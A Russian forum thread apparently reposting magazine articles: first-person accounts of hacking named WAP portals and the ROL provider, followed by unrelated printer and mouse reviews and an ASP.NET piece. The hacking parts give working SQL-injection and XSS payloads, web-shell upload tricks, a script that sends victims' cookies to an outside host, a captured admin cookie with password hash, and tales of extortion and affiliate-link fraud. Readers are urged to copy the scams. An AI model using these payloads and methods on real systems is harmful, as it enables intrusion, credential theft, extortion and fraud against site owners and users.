INSERT INTO `users` VALUES (12959,'kmx','cold-punk','Hoj','1097662073',0,1112319078,1112319089,'Il\'ya','Yavorskij','cold-punk@mail.ru',0,5242880,0,'');

Итак, я мог рулить всеми сайтами конструктора. Вообще, у меня была идея их удалить, но я не стал этого делать, так как админ kmx развернул нешуточную антихакерскую деятельность. Он проверил все свои скрипты на баги и подключил к защите сервера своих знакомых из спецслужб (как он сам говорил). Но, несмотря на это, мне с товарищами все же удалось несколько раз продать эти эксклюзивные хостерские скрипты за кругленькую сумму smile.gif.

seclub.org - вакханалия в чате

Что такое мобильный чат? Это бессонно проведенные ночи у экрана телефона, настоящая дружба и виртуальная любовь, которые всюду ходят с тобой в кармане. Самые лучшие вап-чаты обычно размещены на более или менее посещаемых порталах, одним из которых является seclub.org - клуб любителей трубок от SonyEricsson. Этот популярнейший WAP-портал с не менее популярным чатом тоже оказался подверженным взлому. Именно из-за моих приколов над пользователями админы клуба вынуждены были написать свой новый чат с нуля, а не пользоваться купленным у wap.wab.ru скриптом smile.gif.

А с чего же все началось? Как-то раз, сидя в аське, я узнал у хорошего знакомого про то, что этот чат записывает в базу данных переменную с юзерагентом ($HTTP_USER_AGENT) без каких-либо проверок. Переварив эту инфу и зная о том, что поле с правами пользователя в БД называется «level», я решил проверить чат на sql-injection. Я накатал простенький php-скрипт, увеличивающий «level» на несколько пунктов,

<?

$fp = fsockopen("seclub.org", 80, $errno, $errstr, 30);

$out = "GET /chat/chat.php?id=41711&ps=testaz&rm=4&ref=169569 HTTP/1.1\r\n";

$out .= "Host: seclub.org\r\n";

$out .= "Connection: Close\r\n";

$out .= "User-Agent: 1',level='7\r\n\r\n";

fwrite($fp, $out);

fclose($fp);

?>

и запустил его на Денвере. После чего, зайдя в чат, увидел много новых возможностей: Админская комната, Панель управления администратором, кнопка смены заголовка комнаты и т.д. Админы раз за разом убирали мой статус, а я снова и снова проделывал этот нехитрый трюк, становясь администратором smile.gif.

Так как этот скрипт со временем стал доступен всем и каждому, ты можешь поискать его в вапе и поглумиться над тупыми администраторами. Распознать такой чат можно по специфической странице reghelp.php (в других чатах регистрация оформлена либо совсем без страницы с правилами и помощью, либо эта пага называется по-другому), на которую ты попадаешь сразу после нажатия кнопки «Регистрация» в главном меню.

wap.siemens-club.ru - кривые ручки кодеров

А теперь самое вкусненькое. Wap.Siemens-Club.Ru - вап-представительство сименс-клуба, на сегодняшний день является одним из самых посещаемых ресурсов рувапа с очень высоким доходом. На нем находятся тонны отсортированных загрузок: wav, mmf-мелодии и т.п. Резон для взлома этого портала был очень весомым - возможность шантажа и получения денег.

Разработчиком движка для вап сименс-клуба является человек с ником lastdj (его вап-сайт lastdj.net.ru), кодер довольно неплохой, но невнимательный. Практически в каждый параметр его скриптов можно было вставить кавычку для sql-инъекции (уже потом за умеренную плату админы клуба попросили меня указать их). В общем, их движок был полностью дырявым. Но самая главная бага открывалась взору, если в Опере пройти по вкладке Сервис->Быстрые настройки и нажать «Представляться как Internet explorer», а не как Opera, что стоит там по дефолту. После выполнения этой нехитрой процедуры по адресу wap.siemens-club.ru можно увидеть веб-форму для загрузки своих файлов в вап-обменник (сейчас он находится по адресу: http://wap.siemens-club.ru/?mod=mod_dmelody). Сначала я попробовал загрузить веб-шелл, содержащийся в файле test.jpg.php. Не прокатило: расширение жестко проверялось. Затем, немного подумав, переименовал файл в test.php.jpg. Скрипт спокойно проглотил мой шелл и даже любезно обрезал «.jpg», оставив просто файл test.php smile.gif Что было дальше, думаю, не стоит объяснять. После изучения сервера, поиска всех явок, паролей и доступов я постучал в асю к одному из админов сименс-клуба и потребовал за информацию о дырке немного зеленых денег на подставной кошелек. Админ, естественно, мне не поверил и создал тестовый файл php в корне сайта, попросив меня раскрыть его содержание. Что я и сделал. Но админ снова не понял всю серьезность ситуации. Тогда я удалил из загрузок весь раздел с java-книгами smile.gif. Только после этого товарищ администратор осознал, что нужно что-то делать, перевел мне запрошенную сумму — и я рассказал ему о дырке. А потом все тихо и мирно разошлись.

Думаю, этот пример наглядно показал, почему не стоит доверять непроверенным кодерам.

wap.mypuk.ru - качаем деньги

В свое время (2003-2004 годы) wap.mypuk.ru был самым посещаемым порталом рувапа. Люди заходили на него благодаря неплохому по тем временам чату и огромному каталогу ссылок. После появления партнерских программ админ ресурса решил первым их испытать и поставил на свой сайт эти самые партнерские ссылки. Деньги полились к нему рекой, и мы с товарищами решили, что он должен поделиться smile.gif.

Наверно, всем уже приелась бага phpbb-форума в параметре highlight, но именно она нам помогла. У мурика как раз был установлен такой форум с неплохой вап-модификацией. Собственно, в вап-phpbb бага не работала, а вот в веб проходила на ура. Причем права на запись, удаление и т.д. файлов были полными. В результате залития шелла на сервер мы смогли рулить крупнейшим сайтом рувапа около двух недель. И все эти две недели на несколько часов меняли партерские ссылки контент-провайдеров playfon.ru и mediamobile.ru на свои. Это заметить было сложно, так как такая партнерская ссылка имеет следующий вид:

http://wapb2b.playfon.ru/p/chm.wml?d=232234,

где «d=232234» - ид партнера. Так мы ставили свой ид и продавали на чужом портале около 60-80 игр в день. Правда, деньги за эти игры мы так и не получили, так как, совершенно обнаглевши, стали заменять ссылки уже не на пару часов, а на весь день. В результате Мурик заметил обман и нажаловался контент-провайдеру, который заблокировал наш аккаунт и перевел все деньги обратно Мурику.

Этот взлом можно считать неудачным, но сам прецедент и идея впечатляют. Если тебе удастся взломать какой-нибудь крупный вап-портал, попробуй поднять денег именно таким способом, но сильно не наглей smile.gif.

wap.bodr.net - месть

И снова популярнейший вап-портал с тоннами загрузок. В свое время с админом бодр.нет у нас сложились очень натянутые отношения. Мы заказали вап-конструктор у знакомого кодера за неплохие деньги, затем этот же кодер продал наш конструктор и бодру. После этого началась история взаимных взломов именно через этот конструктор smile.gif.

Итак, сам скрипт у бодра расположен по адресу: wap4.ru. После регистрации пользователь попадает в стандартное меню, где можно залезть сразу же в редактирование главной страницы index.wml. Я сразу зашел в этот раздел, и в каждое из полей (Текст, URL, Картинка и т.д.) ввел символы: ' < > $, чтобы проверить, режутся ли тэги. Тэги не резались только в поле «Картинка». Это очень хорошо. Затем я открыл исходный wml-код страницы редактирования и нашел тэг анкора (аналог <form> в html):

<anchor title="go">OK!<go href="edittext.php?id=32019&p=testoz&page=index.wml&i=5" method="post">

изменил его на

<anchor title="go">OK!<go href="http://wap4.ru/edittext.php?id=32019&p=testoz&page=index.phtml&i=5" method="post">

и сохранил страничку на жестком диске. Ты спросишь, почему именно index.phtml, а не index.php? Привычка smile.gif. Обычно админы забывают про это расширение phtml, и в случае с бодром это тоже оказалось верно.

После открытия сохраненной паги я ввел в поле картинки значение «<? system($cmd) ?>», после чего нажал кнопку «Ок» и получил полноценный шелл на wap4.ru.

Затем мы с товарищами стали шантажировать бодра и сняли с него немного денег smile.gif. Правда, он нам потом отомстил, взломав наш сайт через этот же конструктор, только уже через другую багу. Но все закончилось хорошо.

wap.wep.ru - и снова конструктор

wap.wep.ru (бывший wap.kybuk.ru) - сайт, создавший свою популярность исключительно на рекламе. Его админ вкладывает все деньги, заработанные на продаже мобильного контента исключительно в рекламные аукционы и покупку дорогих скриптов. Одним из таких скриптов снова является популярный в наше время конструктор вап-сайтов, расположенный у кубика по адресу: wxo.ru (глупый домен, не правда ли?). Здесь все было еще проще. Регистрируешь сайт, заходишь на страничку загрузки файлов и заливаешь файл test.phtml, не прибегая ни к каким ухищрениям с расширениями и т.п. Правда, здесь есть одно существенное «но». На сервере с конструктором очень грамотно настроен php, включен safe mode и сопутствующие ему настройки. Здесь пришлось применить мой скрипт, описанный в мартовском ][ (статья «К кому уходят аси?», http://wapp.ru/trash/dir.txt), позволяющий листать директории и просматривать файлы без применения системных функций. После небольшого изучения сервера мы слили все файлы конструктора себе и решили связаться с Кубиком. В итоге договорились о нераспространении скрипта за 10 дней рекламы у него на сайте smile.gif.

Вместо заключения

Надеюсь, ты понял, что баги в WAP-порталах бывают самые разные. К тому же большинство из них успешно мигрировало из ресурсов HTTP. Все ошибки, описанные в этом материале, актуальны до сих пор (если не на одном, так на другом WAP-ресурсе). Твоя задача – намотать это правило на ус и свыкнуться с мыслью, что взлом WAP ничем не сложнее всех остальных хакерских трюков.

Ссылки по теме:

http://script.woweb.ru/index.htm/c/62- некоторые популярные WAP-скрипты

DVD

dir.php-скрипт для работы со взломанным сервером в инклуде с php safe-mode

DANGER

Лично я не советую тебе заниматься взломом WAP-сайтов, так как в мобильном бизнесе крутятся очень большие деньги, из-за которых ты можешь пострадать.


Автор: Metallica Dec 2 2006, 12:47

Бажный провайдер – свободный интернет



Атака на ROL

Крупные хостинги и провайдеры всегда притягивали любопытный хакерский взгляд. И это не удивительно, ведь именно там хранятся базы данных с самой разнообразной информацией: от регистрационных анкет до пользовательских аккаунтов. Рол является одним из крупнейших провайдеров в России и Узбекистане, поэтому в этот раз выбор пал на него.

Быстрый старт

Одним из весенних вечеров, когда заняться было особенно нечем, мне на глаза попалась карточка Рола. Я не раз пользовался услугами данного провайдера, но сейчас меня заинтересовало совсем другое. А именно – защищенность его ресурсов. Недолго думая, я вбил в адресную строку www.rol.ru и нажал Enter. Как показал первый осмотр, ресурс оказался огромным. Кроме новостных лент, он содержал почтовый сервис, личный кабинет, фотоальбом и регистрационные формы. Но меня мало прельщало занятие в виде проверки всех поддоменов, поэтому я решил поверхностно осмотреть скрипты, полагаясь исключительно на кривые руки разработчиков и удачу. Каково же было мое удивление, когда через 15 минут я нашел раскрытие путей установочных каталогов и xss. Уязвимость присутствовала в скрипте second.php, находящемся по адресу: http://www.rol.ru/second.php. Параметр topic не фильтровал входящие данные, в результате чего скрипт любезно выполнял мой javascript-код в браузере. Достаточно было лишь указать запрос вида http://www.rol.ru/second.php?topic=10<script>alert(‘XSS’)</script> — и можно было наблюдать приветливое окошечко с надписью «XSS». Сначала я обрадовался в надежде на возможность получения чужих куков. Но, осмотревшись внимательнее, понял, что не все так просто. Выяснилось, что скрипт фильтровал символ «+». Эту проблему я решил достаточно быстро, написав файл script.js и прилинковав его к основному запросу. Получился следующий линк: http://www.rol.ru/second.php?topic=10<script src=”http://stopthefraud.org/script.js></script>. В script.js я записал сам сценарий: open(‘http://stopthefraud.org/inf.php?’+document.cookie); после чего залил файл на сервер (stopthefraud.org). Тестирование завершилось удачно, уязвимость успешно эксплуатировалась. Но меня смущала одна немаловажная деталь - отсутствие в куках главного домена какой-либо полезной информации. Я хотел было уже приняться за исследование поддоменов, но к этому времени появился заказ — и мне пришлось сесть за работу, оставив в покое Рол.

Все с начала

Наступило лето, а вместе с ним и желание крупного взлома. И тут я вспомнил про Рол. Но, запустив браузер и зайдя по ссылке, я увидел, что админ пропатчил скрипт, и уязвимости больше нет. Меня это несколько огорчило, и я решил восполнить свою утрату любым путем. Для начала был произведен осмотр имеющих поддоменов в количестве 4-х штук: http://mail.rol.ru/ (почтовый сервис), http://voffice.rol.ru/ (личный кабинет), http://photo.rol.ru/ (фотоальбом), http://services.rol.ru/rus/ (цены и тарифы). В личном кабинете я не нашел ничего интересного. Все запросы грамотно фильтровались — и меня посылали куда подальше smile.gif. Аналогичная ситуация обстояла с services.rol.ru. На очереди находился почтовый сервис, который я собирался подвергнуть детальной проверке...




Автор: Metallica Dec 2 2006, 15:41

Все отлично работало. Но мне хотелось большего. Я проверил еще два параметра скрипта: ppuser и password — оба оказались уязвимыми, сплоит для них был общим. Изменив значение ppuser, я вновь просмотрел хтмл-код:

<input type="hidden" name="ppuser" value="<script>alert('xss')</script>" />

Требовалось закрыть кавычкой значение value и добавить />. А в общем виде сплоит выглядел так: “/><script>your_code</script>. Просмотрев еще несколько скриптов и не заметив ничего интересного, я вернулся к showmembers.php. Следует отметить, что данный скрипт был для меня просто «на вес золота». Проверив фильтрацию параметра si, я вновь в этом убедился. На этот раз хтмл-код содержал следующее:

<td><input type="text" name="si" value="<script>alert('xss')</script>" style="width:77px"></td>

Без труда составив сплоит: “</td><script>your_code</script>, я проверил, что все работает на ура.

Таким образом, у меня на руках было 5 рабочих xss на photo.rol.ru и одна проблемная на mail.rol.ru. Весьма неплохой набор. Оставалось лишь выбрать жертву и впарить ей линк.

Выбор жертвы и первый урожай

Мне предстояло выбрать жертву. Конечно, в идеале хотелось получить админские куки. Я насчитал 5 админов в фотоальбоме, но ни у одного в профиле не было указано ни аси, ни мыла. Тогда мой взгляд привлекла домашняя страничка админа с ником Andy@. Зайдя по указанной в профиле ссылке, я попал на сайт какой-то домашней сети. По-видимому, это был сайт админа, но что самое главное – на нем был указан его email. Так как в наличии у меня имелось целых 5 xss, необходимо было определиться с используемой багой. Я решил работать с xss в профиле юзера. Во-первых, при выполнении кода поле «Обо мне» оставалось пустым, что не вызывало подозрений. А во-вторых, я собирался дать админу линк на профиль пользователя. Грамотно составить текст письма с вложенной ссылкой не вызвало особых затруднений. Я вставил в уязвимое поле код: <script>open(‘http://stopthefraud.org/inf.php?’+document.cookie)</script> и залил на сервер снифер. После чего отправил письмо админу с ником Andy@. У меня не было полной уверенности в том, что админ прочитает письмо и зайдет по указанному линку, поэтому я полагался лишь на удачу. И, как ни странно, мне повезло!

Буквально через 40 минут я обнаружил на сервере файл лога slg.txt с админскими куками:

Date and Tiime: 22.06.06 : 16:30:33

IP: 194.67.3.240

Cookie: ppid=3;%20pppass=7c022a2354536d68ffa57c2041edae42;%20defperpage=12

Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3

Заменив в куках свои значения на админские, я моментально набрал в адресной строке photo.rol.ru. Все стало ясно по первой строчке приветствия фотоальбома: «Добро пожаловать, Andy@!». Получилось! Моей радости не было предела. Я сразу полез в админку. К счастью, там не требовалось ввода пароля. Окинув взглядом меню админки, я заметил опцию для работы с БД. Но внезапно вспомнил, что профиль моего пользователя, на который я давал ссылку админу, находится с внедренным javascript-кодом, что может вызвать подозрение у админа при последующих заходах по линку. Я быстро поменял значения куков назад и залогинился под своим юзером. Отредактировав профиль и удалив из поля «Обо мне» код, я вышел. Мне очень хотелось сделать дамп базы альбома. Но не тут-то было. Зайти обратно под админскими куками не получалось! Видимо, админ просек, в чем дело, и успел сменить пароль. Это событие сильно огорчило меня. Подумать только, я ведь мог сделать дамп базы и, возможно, залить веб-шелл, но не успел ни первого, ни второго. Получить админские данные еще раз было нереально. Но на всякий случай отправил админу похожее письмо. Я понимал, что шанс того, что Andy@ снова кликнет на линк, ничтожно мал, поэтому у меня появилась новая идея. Раз в админку мне уже не попасть, то почему бы не поднять несколько пользовательский акков? Тем более что у многих юзеров в профиле был указан email вида юзер@rol.ru, который являлся по совместительству логином к почтовому сервису и личному кабинету, а хэш пароля я мог получить при помощи xss. Я отобрал для эксперимента двух пользователей. Первый – с мылом вида юзер@rol.ru, а второй – со статусом «Privilege User». Отправив письма обоим, я стал ждать. Через час на сервере появился файл лога, из которого я успешно почерпнул куки обоих юзеров. Хэш пароля первого пользователя немедленно отправился на брут, а вот второй юзер, с ником Roman Bazalevsky, меня заинтересовал своим необычным статусом. Кроме того, этот пользователь занимал второе место вслед за админом в рейтинге активнейших авторов. К моему разочарованию, никакими дополнительными полномочиями Roman Bazalevsky не обладал, но вот большая часть его галереи являлась закрытой. Я быстро просмотрел все установленные юзером пароли — и мог теперь пользоваться его галереей из-под любого аккаунтаsmile.gif.Было уже под утро, и мне хотелось спать, учитывая две бессонные ночи. Я закрыл окно браузера, выключил монитор, лег на кровать и уснул.

Подводим итоги

Проспал я около 6 часов, не обращая внимания на будильник. Затем встал и подошел к монитору. Увы, но сбрутить хэш первого пользователя не удалось. Запустив крысу, я получил мессагу с заказом от LoFFi и два сообщения от kid_rock’a. Статус LoFFi показывал, что он спит, а вот kid_rock был на месте. Я отписал ему о ночных событиях, о найденных мной уязвимостях и о том, как пролетел с админкой. После недолгой беседы kid_rock выдвинул свой вариант. Он предлагал собрать спамбазу юзеров Рола и проспамить их с указанным линком. В результате данной операции мы могли получить здоровую базу с хэшами паролей пользователей, часть из которых наверняка бы сбрутилась. Но, обсудив все детали, мы приняли решение не делать этого. Веским аргументом послужили 2 невыполненных заказа, на которые попросту не хватило времени.

Я задумался. В голове крутился один вопрос: «Каковы итоги взлома?». Уже через несколько секунд я сам ответил себе на него. Не смотря на то, что я не успел сдампить базу, итоги были вполне удовлетворительными. У меня существовала возможность получить доступ практически к любому из нескольких тысяч аккаунтов Рола, включая доступ к почтовому сервису и личному кабинету. А ведь такая возможность могла существовать не у меня одного. Я думаю, не стоит и говорить, к чему могли привести ошибки программистов и администраторов Рола – одного из крупнейших провайдеров России.

DVD

На DVD-диске ты найдешь видео, наглядно показывающее взлом ROL.

Danger

Внимание! Все действия взломщика противозаконны! Информация предоставлена исключительно с целью ознакомления! Ни автор, ни редакция за твои действия ответственности не несут!

Info

Многие считают, что xss – фактически бесполезная уязвимость. В своей статье я доказал, что это далеко не так. Часто возникают ситуации, когда кажется, что скрипт фильтрует входящие данные. Поэтому всегда просматривай html-код страницы, и тогда ты сможешь составить рабочий сплоит под конкретную xss-багу.



Автор: Metallica Dec 2 2006, 16:42

Печатные машинки
Бюджетные принтеры для дома

test_lab выражает благодарность за предоставленное оборудование российским представительствам компаний HP, Canon, Lexmark и Epson.

Список тестируемого оборудования:

Lexmark Z735

Lexmark P915

Canon Pixma IP1600

Canon Pixma IP2200

Canon Pixma IP4200

Epson С48

Epson С67

Epson Stylus C67 Photo Edition

HP Deskjet 3940

HP Deskjet 5443

HP Deskjet 5943

Закончилась сессия, а с ней и многие вещи, которые требовали вмешательства принтера: печать курсовых, рефератов, докладов и прочих составляющих насыщенной студенческой жизни. Вроде бы, печатающие головки могут отдохнуть от расставания с чернилами, а каретка, уставшая бегать туда-сюда, тоже имеет право на временную передышку. Но не тут-то было! Скоро осень, которая принесет с собой пересдачу «хвостов», новый семестр, требующий «аккуратного оформления работ» и так далее. Но и летом, в неучебную пору, принтеру может найтись работенка: распечатать какой-нибудь документ, схему, слайд или диаграмму, но чаще — фотки с последней попойки.

Хочется иметь устройство, которое бы круглый год радовало хорошим качеством отпечатков. Сегодня мы протестировали доступные универсальные принтеры, которые подходят для всех типичных домашних задач, возникающих обычно у школьников, студентов и их родителей. Эти устройства качественные, надежные, недорогие, пригодны даже для печати фотографий.

Методика тестирования

Вначале на каждом принтере выводилась его собственная тестовая страница. Для проверки базовых функций печати нами использовалась специальная тестовая страница, состоящая из наиболее часто встречающихся элементов: текста (разного размера, толщины и наклона), таблицы, диаграммы и картинки. Эта страница выводилась при помощи Microsoft Word на дефолтных настройках качества на обычной бумаге. Большинство принтеров нашего обзора были оснащены фотокартриджами. Тестовая фотография (размер стандартный (10х15), человек — на переднем плане, ночная улица — на заднем, много ярких цветов для проверки естественности цветопередачи) распечатывалась на фотобумаге из программы ACDSee 8 с выставлением в настройках принтера максимального качества отпечатка. В обоих случаях засекалось время с момента нажатия кнопки Print и до полного завершения процесса печати.

Оценивались качество полученных фоток, четкость, яркость цветов, зернистость и естественность передачи цветов. Мы также обращали внимание и на удобство работы с ними (механизм подачи, замена картриджа, возможности ПО и так далее).

Lexmark Z735

7 баллов

Цена, $: 60

Максимальное разрешение, dpi: 4800х1200

Максимальная скорость цветной печати, стр\мин: 15

Максимальная скорость монохромной печати, стр\мин: 15

Емкость лотка для бумаги, шт: 100

Дополнительно: ПО для работы с изображениями в комплекте поставки

Интерфейс: USB

Габариты, мм: 157x377x224

Вес, кг: 2,3

Очень простое и компактное устройство, которое не займет много места на столе и хорошо справится с несложными домашними задачами. Сам по себе принтер очень прост – на нем имеются всего две кнопки управления: включение питания и выдача бумаги. Кстати, ею в процессе тестирования пользоваться не приходилось: бумага подавалась ровно и не мялась на выходе. С принтером поставляется удобное и несложное фирменное ПО, предназначенное для работы с изображениями. Тестовая страница распечаталась довольно быстро (43 с). Фотография получилась на удивление качественной.

Хотя и печаталась долго (2,5 мин.). «На удивление» – потому что этот принтер не поддерживает фотопечать и во всех задачах обходится одним картриджем. В общем, это удобно. Как уже говорилось выше, тестовая страница распечаталась быстро, но это оказалось единственным достоинством, которое принтер показал в данном испытании. Картинка на ней была блеклой, текст был не черного, а какого-то болотно-зеленого цвета. Четкость — ниже средней.

Lexmark P915

9 баллов

Цена, $: 120

Максимальное разрешение, dpi: 4800х1200

Максимальная скорость цветной печати, стр\мин: 15

Максимальная скорость монохромной печати, стр\мин: 22

Емкость лотка для бумаги, шт: 100

Дополнительно: поддержка интерфейса PictBridge, ЖК-экран, автономная печать с карт памяти форматов CompactFlash I/II, Memory Stick, Multi Media, Secure Digital, SmartMedia, Microdrive, xD

Интерфейс: USB

Габариты, мм: 150x428x237

Вес, кг: 3,5

Гораздо более функциональная модель. Lexmark P915 оснащен фотокартриджем, что существенно повышает его возможности и качество отпечатков. Кроме того, работа с фотографиями может осуществляться и автономно, без ПК – через интерфейс PictBridge или с помощью карт памяти. Посредством встроенного ЖК-экрана можно легко управлять настройками устройства, а также просматривать и редактировать фотографии. Тут, несмотря на простоту и удобство меню, пригодится полная русификация принтера: от драйверов (которые, как и у предыдущего устройства, дублируют голосом экранные сообщения) до надписей на корпусе. Тестовая страница распечаталась четко и качественно, правда, не за рекордное время (1 минута и 9 секунд). Работа над фотографией заняла минуту и 20 секунд. Качество приемлемое, хотя задний план мог бы быть пропечатан четче, а цвета — понасыщеннее. При работе наблюдался неприятный момент: довольно часто страницы и фотографии печатались не полностью, наполовину или на треть. Решалась проблема сама собой: путем несколько раз повторенного задания на печать. Возможно, проблема решится обновлением драйверов.

Canon PIXMA iP1600

6 баллов

Цена, $: 75

Максимальное разрешение, dpi: 4800х1200

Максимальная скорость цветной печати, стр\мин: 16

Максимальная скорость монохромной печати, стр\мин: 19

Емкость лотка для бумаги, шт: 100

Дополнительно: ПО для работы с изображениями в комплекте поставки

Интерфейс: USB

Габариты, мм: 435x249x165

Вес, кг: 2,9

Еще один очень простой в освоении и обращении принтер. Имеет всего пару управляющих клавиш: для включения питания и выдачи застрявшего бумажного листа. Что очень понравилось в этой модели, так это скорость ее работы. Тестовая страница была распечатана за каких-то 25 секунд. Причем качество текста, таблицы и диаграммы не вызывает нареканий: все четкое и читабельное. В общем, для школьника-студента, который ищет приемлемую по цене модель для распечатки рефератов – самое то.


А вот качество фотографий в обоих тестах оказалось низким. На тестовой странице цвета были не очень насыщенными. Фотография не выдерживает вообще никакой критики – по всей распечатке проходят широкие горизонтальные полосы. Хотя основное преимущество модели сохранено и тут: печать фотографии отняла всего 45 секунд. Это даже меньше, чем указано на наклейке!

Canon PIXMA iP2200

7 баллов

Цена, $: 110

Максимальное разрешение, dpi: 4800х1200

Максимальная скорость цветной печати, стр\мин: 17

Максимальная скорость монохромной печати, стр\мин: 22

Емкость лотка для бумаги, шт: 100

Дополнительно: ПО для работы с изображениями в комплекте поставки

Интерфейс: USB

Габариты, мм: 435x263x165

Вес, кг: 2,9

Более производительная модификация предыдущей модели, обладающая к тому же более высоким качеством печати. Дизайн этих принтеров абсолютно идентичен, разве что Canon PIXMA iP2200 чуть больше, хотя это и незаметно. Набор прилагаемого программного обеспечения также одинаков, так как драйвера унифицированы вместе с утилитами. Зато основной козырь iP1600 тут сохранился и даже улучшился – скорость печати очень высока. Тестовая страница была выдана за 23 секунды, причем качество текста осталось столь же высоким, а качество картинки несколько выросло: она стала более четкой, насыщенной и естественной. Кардинально улучшился отпечаток на фотобумаге – теперь никаких полос нет и в помине. В общем, очень грамотно усовершенствованная базовая модель.

К сожалению, все проблемы не решены. И дело тут опять в картинках: по сравнению с отпечатками, сделанными другими моделями, качество цветопередачи явно ниже. Поэтому мы рекомендуем обе эти модели тем, кто печатает фотки редко.

Canon Pixma IP4200 (Выбор редакции)

9 баллов

Цена, $: 130

Максимальное разрешение, dpi: 9600 х 2400

Максимальная скорость цветной печати, стр\мин: 10

Максимальная скорость монохромной печати, стр\мин: 15

Емкость лотка для бумаги, шт: 100

Дополнительно: DirectPrint, PictBridge, печать на CD и DVD

Интерфейс: USB

Габариты, мм: 419x299x160

Вес, кг: 6,5

Довольно большое по размерам, но в то же время очень функциональное устройство. Помимо того, что оно быстро и очень качественно распечатало нашу тестовую страницу (23 с.) и фотографию (25 с.), в его активе есть возможность печати на оптических носителях, а также прямая печать с камер и фотоаппаратов (интерфейс PictBridge). Не стоит также забывать и про два лотка подачи бумаги и встроенное устройство для автоматической двусторонней печати – теперь тебе не придется вручную переворачивать и перекладывать странички. Компания Canon призывает использовать для печати только свои картриджи и бумагу – в этом случае, благодаря специальным технологиям, нас поразит качество отпечатков и долговечность их хранения. Как уже было сказано выше, качество отпечатков отличное, никаких нареканий оно не вызывает. В общем, это хорошее и универсальное устройство.

Цена немного выше, чем у остальных устройств из обзора. Так же, как и габариты изделия.



Автор: Metallica Dec 2 2006, 17:58

- Из-за своей скромной цены у устройства начисто отсутствуют разные интересные и полезные дополнительные функции. В принципе, если тебе нужна простая и удобная мышка без особых наворотов – то это твой вариант.

Oklick 853S

7 звезд, $30

Интерфейс: беспроводный

Тип сенсора: оптический

Максимальное разрешение сенсора, dpi: 800

Дополнительные возможности: зарядная база, подзарядка во время работы

+ Небольшой грызун, предназначенный для использования обеими руками – разумеется не сразу, просто левшей произвдители не забыли. Она оптическая (800 dpi) и беспроводная, то есть джентльменский набор выполнен. Имеет две основных клавиши, колесико прокрутки и два индикатора – передачи данных и зарядки батарей. Колесико, кстати, может быть настроено на выполнение не только скроллинговых функций. В комплект поставки входит док-станция, являющаяся по совместительству зарядным устройством и два аккумулятора. Кстати, мышь с помощью специального провода можно заряжать и во время работы. Радиус работы передатчика составляет 1,5 м. В принципе, благодаря дополнительному шнурку и небольшим размерам, мышь можно использовать с ноутбуком.

- Кроме настраиваемого колесика нет никаких дополнительных клавиш. Да и вообще другие функции отсутствуют. Малые размеры не очень удобны для крупной ладони и игры.

Выводы

Протестирован полный набор разноплановых мышек: обычные, игровые, мобильные. Заядлым геймерам советуем обратить внимания на изделия Razer – для игры это самое то. Титул “Выбор редакции” получает Logitech MX610 Laser Cordless Mouse – за функциональность и качество работы. А “Лучшая покупка” это Genius Ergo 525 – недорогая, удобная, в меру игровая.


Автор: Metallica Dec 5 2006, 17:06

ПЕРСПЕКТИВЫ ASP.NET

МЫ ПОГОВОРИМ О КОРПОРАЦИИ MICROSOFT И ЕЕ ОЧЕРЕДНОМ ШАГЕ В БОРЬБЕ ЗА ОБЛАСТЬ РЫНКА, СВЯЗАННУЮ С РАЗРАБОТКОЙ WEB-ОРИЕНТИРОВАННЫХ ПРИЛОЖЕНИЙ. ЭТОТ ШАГ — ТЕХНОЛОГИЯ ASP.NET

история болезни

Успехи ASP.NET очевидны. Рекордсменом можно считать ресурс MySpace.com, созданный на основе ASP.NET 2.0 и работающий под управлением IIS 6.0. Количество посещений этого ресурса в течение дня достигло полутора миллиардов страниц в день. Как блог, для Китая пока не тянет? Все-таки оцени еще пару фактов. Переход MySpace.com на технологию ASP.NET с «другой» технологии занял один год (ранее использовавшуюся технологию в источниках не называют, наверное, чтобы не портить настроение нам с тобой). В результате перехода средняя загрузка серверов упала с 85% до 27%. Впечатляет? Как web-разработчика — да!

масштаб

Тебя впечатляет вид Эйфелевой башни или Ниагарского водопада? А вид традиционных японских статуэток нэцкэ? Наверное, тоже. На этот раз мы поговорим о масштабах. Возможно, успехи не-windows-ориентированных систем разработки и развертывания web-приложений мало заметны на фоне грандиозных показателей таких гигантов, как MSN или eBay. Но это только верхушка айсберга рынка web-приложений. С одной стороны, на верхних строчках поисковых запросов находятся крупные ресурсы, созданные с помощью ASP.NET в количестве, скажем, десяти штук. С другой стороны, остаются сотни тысяч ресурсов, созданные с помощью иных технологий.

Оценивая эволюцию ASP, можно сказать, что каждый ее этап был качественным и необходимым. Функциональность каждого нового поколения расширялась за счет упрощения средств создания приложений и увеличения количества доступных инструментов.

На первом этапе была реализация, аналогичная CGI (Common Gateway Interface), — ISAPI (Internet Server Application Programming Interface). Поскольку «родиной» web-приложений является операционная система Unix, методы их реализации построены в соответствии с идеологией этой операционной системы. Не углубляясь в подробности, можно выделить основную особенность этой идеологии — вызов интерпретатора через CGI-интерфейс. С точки зрения производительности, не лучший вариант. ISAPI-приложение, в свою очередь, представлялось в виде динамически присоединяемой библиотеки (DLL), которая выполнялась в процессе web-сервера. Это позволило увеличить производительность и создавать более сложные схемы построения web-приложений. Однако приходилось останавливать сервер для обновления ISAPI-библиотек — огромный недостаток.

Следующий этап, по сути, стал ключевым в формировании современного представления о web-разработке, а именно — разделение слова «web-разработка» на «web» и «разработка». В новой идеологии часть работы, имеющая отношение к внешнему оформлению web-сайта, перекладывалась на плечи одного человека — дизайнера, а часть, которая касается функционального ядра приложения, — на плечи программиста. Благодаря использованию ASP (Active Server Pages) был ускорен и упрощен процесс разработки и отладки приложения. Однако возможны случайные нарушения его работоспособности, так как элементы оформления и функциональная начинка объединены в одном документе. Такими нарушителями друг для друга становились и дизайнеры, и разработчики проекта. Также отрицательно сказывалась необходимость вызывать интерпретатор для выполнения скриптовых языков внутри ASP-страницы. Процедура небыстрая и постоянно повторяемая, то есть неоптимальная в плане производительности.
Сегодня ASP.NET представляет собой смесь нескольких технологий:

ЯЗЫКИ СЕМЕЙСТВА .NET;

СРЕДА ИСПОЛНЕНИЯ ОБЩИХ ЯЗЫКОВ (COMMON LANGUAGE RUNTIME — CLR);

БИБЛИОТЕКА КЛАССОВ .NET;

СЛУЖБЫ ASP.NET;

СРЕДА РАЗРАБОТКИ VISUAL STUDIO .NET.

эффективность

